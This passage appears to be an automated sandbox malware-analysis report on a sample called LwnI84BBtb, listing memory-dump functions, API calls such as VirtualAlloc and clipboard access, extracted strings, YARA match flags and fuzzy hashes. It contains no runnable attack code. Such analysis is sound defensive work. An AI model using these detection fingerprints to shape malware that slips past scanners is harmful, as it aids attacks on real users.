                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418638
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID:
                                                    • API String ID: 237503144-0
                                                    • Opcode ID: 8fbd10a75e567c23622f6f1f1af2b8b55c0af1b8ad70b396d9a66fe143293182
                                                    • Instruction ID: eb8c1c7914f9d0c13229cf9ff11979a1d61f9c5fd9cbf3551faf471138ca6978
                                                    • Opcode Fuzzy Hash: 8fbd10a75e567c23622f6f1f1af2b8b55c0af1b8ad70b396d9a66fe143293182
                                                    • Instruction Fuzzy Hash: 1CF02EBA900200AFDA20DF25CC05E2337A8EB85324B00882DF26BC3291EB30E410DB04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01A4F2D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A4E000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1a4e000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: c690e436671eff5f0a9644ed3fbbf051fe519ee5d2e26ffded1c6165218c6cd1
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: B1112B79A00208EFDB01DF98CA85E98BBF5AF08351F058094F9489B361D771EA50DF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$CloseDataInfoOpenWindow
                                                    • String ID: a$b$c$c$l$n
                                                    • API String ID: 2278096442-2118919457
                                                    • Opcode ID: 64775b5eaf4b6f3b9d3a5648747dfa61d183d83a94ea54748d631ebe41212b84
                                                    • Instruction ID: f32526a2b7493747e302e038e132543e99afde457dca7fc2a9710eba875402e9
                                                    • Opcode Fuzzy Hash: 64775b5eaf4b6f3b9d3a5648747dfa61d183d83a94ea54748d631ebe41212b84
                                                    • Instruction Fuzzy Hash: 26517EB0908B80CFC720DF38D485A16BBF1AB15314F148A6DE8D68B796D739E446CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0366595F
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 03665995
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,00000000,?), ref: 03665CBF
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,?,?), ref: 03665D04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: VSB
                                                    • API String ID: 237503144-2654250299
                                                    • Opcode ID: 42af359a222c5161f70fb859cd19a903b14d8ab4fd0dfb036164610f8498505b
                                                    • Instruction ID: 215b7bc4bba9a78a7ccc2001b721e70f5be892fd5ae9c90312ee2d43e14e8f8a
                                                    • Opcode Fuzzy Hash: 42af359a222c5161f70fb859cd19a903b14d8ab4fd0dfb036164610f8498505b
                                                    • Instruction Fuzzy Hash: 2FF17CB5A00B01AFD724CF29C842B63BBF5FF4A314F14461DE9AA8B790E371A411CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452$A^Y[$MVVS$UUC\$kJMO
                                                    • API String ID: 0-3157732848
                                                    • Opcode ID: 08fb9053458d0069092ab075ac869d68a8945f95c6ad2078fbf6478a2e09a0e2
                                                    • Instruction ID: 4fd5cfa8d526ce1163170c0d4c556d838f9ac152a5a480ad83753cf833bab756
                                                    • Opcode Fuzzy Hash: 08fb9053458d0069092ab075ac869d68a8945f95c6ad2078fbf6478a2e09a0e2
                                                    • Instruction Fuzzy Hash: 2B528A70604B418BE339CF29C194766FBE2BF56304F988A6DC4E78BB91C775A40ACB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452$A^Y[$MVVS$UUC\$kJMO
                                                    • API String ID: 0-3157732848
                                                    • Opcode ID: b5052e699182a1a0a308292b471bdefcab18d731424f3935f2db044417b9ce16
                                                    • Instruction ID: 855735e6d1ad8dab1ee178d7f2696252d8d8baabb8e7f5f75f29c0cf4dda7a31
                                                    • Opcode Fuzzy Hash: b5052e699182a1a0a308292b471bdefcab18d731424f3935f2db044417b9ce16
                                                    • Instruction Fuzzy Hash: 2B52BE70204B918BD339CF29D094767BBE1BF56304F944A6EC4E78BB91C779A40ACB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    • Opcode ID: 3511b082d5560558510c94d3efdee04cf19d2c1898fd965802b973fdfc2f06ca
                                                    • Instruction ID: 5dda91b3fb5c47d47c0aed4dc4ade46d4d532827df6262973719a72d047e01a3
                                                    • Opcode Fuzzy Hash: 3511b082d5560558510c94d3efdee04cf19d2c1898fd965802b973fdfc2f06ca
                                                    • Instruction Fuzzy Hash: F612FD75A083849FD714CF29D89076ABBE1EF84300F0885ADFD859B381D779D909CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: m!s$7q9w$tu
                                                    • API String ID: 0-1328737773
                                                    • Opcode ID: 630394122b1b40b6e144354b10afeacad49fa940cd3a6ea08509c0a48de16aad
                                                    • Instruction ID: fc647ed772eb2ced52a6090c41d271979165a73241d22065ff20f439ecc1416e
                                                    • Opcode Fuzzy Hash: 630394122b1b40b6e144354b10afeacad49fa940cd3a6ea08509c0a48de16aad
                                                    • Instruction Fuzzy Hash: 3691F0B5A043019BDB14DF14C891B7BB7B9EF85358F184A1CE8D28B380E375D915C7AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: 9feceadad15020c132ea2c4a78b8738774c8baf946a179999bde27638b997186
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: 7C315AB6900609DFDB10CF99C980AAEFBF9FF48324F14515AE841AB314D771EA45CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: c28052362693d2ec878eb2e9e4053acdb697fe5a00c1b3c7cf0b2954dfd04b5c
                                                    • Instruction ID: 63395121d4398ba517b4634e3d683b8820c2d203a1f52bbdc50c14e21e080acd
                                                    • Opcode Fuzzy Hash: c28052362693d2ec878eb2e9e4053acdb697fe5a00c1b3c7cf0b2954dfd04b5c
                                                    • Instruction Fuzzy Hash: 037299716083409FD724CF18C598B6FBBE2AF85314F08886DF98A8B3A1D771D955CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: f72422da4545a53147ba4bcae673fa22cfdc217a8e972246317f84f25e8baf34
                                                    • Instruction ID: f7f0119f1880cbbeb85be2149024bdb2ea19f96f545e0beea172c8d0a898f24a
                                                    • Opcode Fuzzy Hash: f72422da4545a53147ba4bcae673fa22cfdc217a8e972246317f84f25e8baf34
                                                    • Instruction Fuzzy Hash: 02222271208740AFDB148F18C840B6BBBE2EF88314F18892EF8899B391D375D954CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    • Opcode ID: cd1c842c8cb882f8655696e56ea315231ebb5dd9269e9338f9166ab2116c86d1
                                                    • Instruction ID: 64ec53fe52b6966c07490266549521a1a213f14004d4db5264f8b61d474b3853
                                                    • Opcode Fuzzy Hash: cd1c842c8cb882f8655696e56ea315231ebb5dd9269e9338f9166ab2116c86d1
                                                    • Instruction Fuzzy Hash: 3CC10276A043528BC329CF18C490A6BF7E1FF89314F198A6CE8A69B351C730D955CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    • Opcode ID: 74c130e40fe79eb5353d4bfd90c88b1850b3b32b31115821f60d9fac73404323
                                                    • Instruction ID: 8a29a55053717aff0ea9d03566f8ae78156dab941fa58883738f942dff897c1f
                                                    • Opcode Fuzzy Hash: 74c130e40fe79eb5353d4bfd90c88b1850b3b32b31115821f60d9fac73404323
                                                    • Instruction Fuzzy Hash: B9C10172A043128BC725CF18C490B6BB7A1FF89314F19966DE9A69B351C738ED04CBD6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: 570d64d0102431681fc9c2953f0e3e491529824ae676a0b8b950b5723fab437e
                                                    • Instruction ID: bdea24ff9dfb5e0cd0db60fba46b67bbb96c489911e557cb46ccc3a4af15eb87
                                                    • Opcode Fuzzy Hash: 570d64d0102431681fc9c2953f0e3e491529824ae676a0b8b950b5723fab437e
                                                    • Instruction Fuzzy Hash: D0B12631209380AFCB21CF58C880B5FBBE1AF99314F08885EF98597392D675D854DBA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: 74347a645ffaf85fd77ae73b23a4eccb862ef996c88cbf721dd42e1b28c782df
                                                    • Instruction ID: 37c8e6d2c4d31b8ff407cb87492de83e2db98608a9e4700acb08c765a7b3870e
                                                    • Opcode Fuzzy Hash: 74347a645ffaf85fd77ae73b23a4eccb862ef996c88cbf721dd42e1b28c782df
                                                    • Instruction Fuzzy Hash: 64A135316083809FD725CF68D880B6FBBE1EF99350F04882EFA8997391D675D914CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !$|)t+
                                                    • API String ID: 0-1543151180
                                                    • Opcode ID: a01c931c2f573e3a0e1da8e8599f919eb061fd7c53aebc2c304cd03effb064b8
                                                    • Instruction ID: ea64d36a8efc891e87062eff07437b3e2be5a35ed4b93f8686fde786b335496e
                                                    • Opcode Fuzzy Hash: a01c931c2f573e3a0e1da8e8599f919eb061fd7c53aebc2c304cd03effb064b8
                                                    • Instruction Fuzzy Hash: 51419C716083109BC718DF19C8A072BB7B4FFC6368F089A1CE8929B380E774D505CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: f543
                                                    • API String ID: 0-424919641
                                                    • Opcode ID: ee1e641224ab94123951b88dafefde2f31790dbb0f3442288f09851e838e1533
                                                    • Instruction ID: b40e348f08bbfe335c39851f99ee760afcc255fabdb07f8731fc9d327c8f0f96
                                                    • Opcode Fuzzy Hash: ee1e641224ab94123951b88dafefde2f31790dbb0f3442288f09851e838e1533
                                                    • Instruction Fuzzy Hash: C0326AB56083419BD714CF24C490B2BFBE2BFC9318F188A2CEA959B395D775D806CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: f543
                                                    • API String ID: 0-424919641
                                                    • Opcode ID: cb28e1dc32981d7d3d693a3383427b54ad9a9947427a3bfbd9cf92e65b9a9054
                                                    • Instruction ID: a27fba163ec8ca6502e179a43430a23e18181e16a5da658c1e63ab54147eeb45
                                                    • Opcode Fuzzy Hash: cb28e1dc32981d7d3d693a3383427b54ad9a9947427a3bfbd9cf92e65b9a9054
                                                    • Instruction Fuzzy Hash: 04327B742083419FD714CF24C494B2BBBE2BBC9318F65DA1EE8958B391C778D805CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
                                                    • Instruction ID: dd012700d8ef635f1f170d3082998ca63797033dedc0db44f50df7671fef13c3
                                                    • Opcode Fuzzy Hash: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
                                                    • Instruction Fuzzy Hash: A3E169B0504F818BD339CF39C1A47A6BBE1BB56304F984A6EC4E74BB91C775A10ACB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
                                                    • Instruction ID: 9183c8cb2bdce41f8d6db81880cd269f3f93fb1448a1f7e838d0594f66b23865
                                                    • Opcode Fuzzy Hash: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
                                                    • Instruction Fuzzy Hash: C7E16A70604B908BD33ACF39D0943A7BBE1BF56304F954A6EC4E74B791C739A4068B48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
                                                    • Instruction ID: 175d91f90dd5b8ea7ceeba11fb5a2aec54ce5ef450c4045aa23f9b205a3c5978
                                                    • Opcode Fuzzy Hash: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
                                                    • Instruction Fuzzy Hash: 77E159B0504F818BD339CF39C1A47A6BBE1BB56304F984A6EC4E74B691C775A10ACB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
                                                    • Instruction ID: 0f5e2fea7ca9d0fcb5471046c57c7772b20413f2ee2d671d3732f2d6399003e3
                                                    • Opcode Fuzzy Hash: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
                                                    • Instruction Fuzzy Hash: E8E16970604B918BD329CF39D0A43A7BBE1BB56304F954A6EC4E74B691C779A409CB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
                                                    • Instruction ID: 43e57b81c96155ac0d8e57886c867ea9dea497cf62254fc01aa16d5e257b5ee3
                                                    • Opcode Fuzzy Hash: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
                                                    • Instruction Fuzzy Hash: 5CD17970504F818BE326CF39C1A47A7BBE2AF56304F984A5DC4E74B791C779A40ACB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7452
                                                    • API String ID: 0-87867774
                                                    • Opcode ID: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
                                                    • Instruction ID: d473763cb8fcafe3d71cd73cd2a945522f078f264cb0929a2263decf9abb313e
                                                    • Opcode Fuzzy Hash: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
                                                    • Instruction Fuzzy Hash: 3ED19D70604B908BD326CF34D0A47A7BBE2BF56304F950A5EC8E70B791C779A40ACB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: :B
                                                    • API String ID: 0-3257028938
                                                    • Opcode ID: 1e0049a4c92e93eedd58dfb0be8b66b9b761d6fa7d8c5b3983c2548ff99060e7
                                                    • Instruction ID: 09b935edd412787e5b2a2bf3daa3aafbe39965d069c9499b9a537e59a8c6aef4
                                                    • Opcode Fuzzy Hash: 1e0049a4c92e93eedd58dfb0be8b66b9b761d6fa7d8c5b3983c2548ff99060e7
                                                    • Instruction Fuzzy Hash: BFB17C741007018BD725CF29C891B63B7B1FF86364F198A5CD8968FB95E774E841CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: :B
                                                    • API String ID: 0-3257028938
                                                    • Opcode ID: 3e821f729e7bd7966f8aa8fdbbe72b6607c3b13e90e0310993c0f98e2796235a
                                                    • Instruction ID: 2c342faefb3c2e803dbce2d9fb269bbbc951d39f873bbb010e15bb50d674dad7
                                                    • Opcode Fuzzy Hash: 3e821f729e7bd7966f8aa8fdbbe72b6607c3b13e90e0310993c0f98e2796235a
                                                    • Instruction Fuzzy Hash: 5CB18A742047018BD725CF19C8A1763B7F2FF86324F18855DD8968BB96E778E882CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,
                                                    • API String ID: 0-3772416878
                                                    • Opcode ID: ba0ccf94401fd5fba908be8ff873a84c86c8c083a6df85b5acfb8f2518fe5101
                                                    • Instruction ID: 0d8966ef7d050a0ec093872ade78419a3f07b231ada14620d39ddb812e519fe1
                                                    • Opcode Fuzzy Hash: ba0ccf94401fd5fba908be8ff873a84c86c8c083a6df85b5acfb8f2518fe5101
                                                    • Instruction Fuzzy Hash: FBB13A71109381AFD314CF68C94465BFBE0AFA9304F444A6EF4D997382D375EA28CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3650000_LwnI84BBtb.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "64.
                                                    • API String ID: 0-1818615731
                                                    • Opcode ID: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
                                                    • Instruction ID: 70ec7abdc7c3ec1120867b6bee7f83e7d46de2b828d2d55ce8212b4e5eb0cc1b
                                                    • Opcode Fuzzy Hash: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
                                                    • Instruction Fuzzy Hash: E8613D70504F818BD726CF39C8687A3BBF0AF1220AF58199DD1EB8B692D775A446CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1920730607.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_LwnI84BBtb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "64.
                                                    • API String ID: 0-1818615731
                                                    • Opcode ID: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
                                                    • Instruction ID: 9cbbebd9cf2853766a7fd533854aba19562981c866732ef8e5855bd5c730c658
                                                    • Opcode Fuzzy Hash: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
                                                    • Instruction Fuzzy Hash: FC614970504F918BD7268F34D8647A3BBE0AB5330AF54199ED1EB8B692D339A446CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
